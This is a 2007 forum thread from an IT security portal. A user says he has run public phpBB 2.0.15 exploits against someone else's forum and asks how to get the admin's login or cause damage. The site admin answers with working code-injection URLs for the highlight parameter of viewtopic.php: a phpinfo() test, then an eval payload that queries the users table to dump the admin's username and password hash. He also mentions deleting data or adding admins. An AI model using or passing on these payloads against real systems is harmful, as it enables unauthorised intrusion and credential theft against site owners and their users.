Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 52
Members: 0
Total: 52
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> Need Help
Post new topicReply to topic View previous topic :: View next topic
Need Help
PostPosted: Sun Aug 12, 2007 9:27 pm Reply with quote
Yata
Beginner
Beginner
Joined: Aug 13, 2007
Posts: 1




Ok so Im a noob here, I was running some exploits for php 2.0.15 on a forum through the cmd both perl and python. I managed to use this script 'http://downloads.securityfocus.com/vulnerabilities/exploits/phpbb2_0_15.pl' but once running it I have no idea if there is a way to use it to get the admins user or pass or wreck any havok
Similary with this script 'http://milw0rm.com/id.php?id=1080' which gives me the details '
database host: localhost
database name: xxxx_forums2
username: xxxxx
password: xxxxx

only replace the x's with the actual data I got, is there any way to use this to my advantage considering i dont have admin access to gain it? If anyone helps me I will be thankfull but due to the insulting nature of me not knowning this information already I understand if no-one does.
Thanks.
View user's profile Send private message
PostPosted: Mon Aug 13, 2007 11:21 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




It seems, that you can execute arbitrary php code in victim's webserver. Try this for beginning:

http://localhost/phpbb.2.0.15/viewtopic.php?t=1&highlight='.phpinfo().'

Of course, first modify this url to suit your specific conditions.

If you will get result of the "phpinfo()" function, then it is not hard to manipulate the database - delete something, add new admins, steal password hashes, etc.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Aug 13, 2007 1:22 pm Reply with quote
Yata
Beginner
Beginner
Joined: Aug 13, 2007
Posts: 1




it does indeed let me use that code and displays all sorts of php information. Not being a wizard in php I have no idea how to use this to a way or find the right code to do anything malicous.
View user's profile Send private message
PostPosted: Mon Aug 13, 2007 2:13 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




OK, i was running some tests on my own local phpbb 2.0.15 installation and this is one useful info stealing method:

http://localhost/phpbb.2.0.15/viewtopic.php?t=1&highlight='.eval(stripslashes($_GET[kala])).'&kala=$s='SELECT+*+FROM+phpbb_users+WHERE+user_id=2';$r=$db-%3Esql_query($s);$u=$db-%3Esql_fetchrow($r);var_dump($u);

If database prefix is "phpbb_" and admin's ID is 2, then you will see admin's username, password md5 hash and other info. Change ID, if needed.
View user's profile Send private message Send e-mail Visit poster's website
Need Help
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.061 Seconds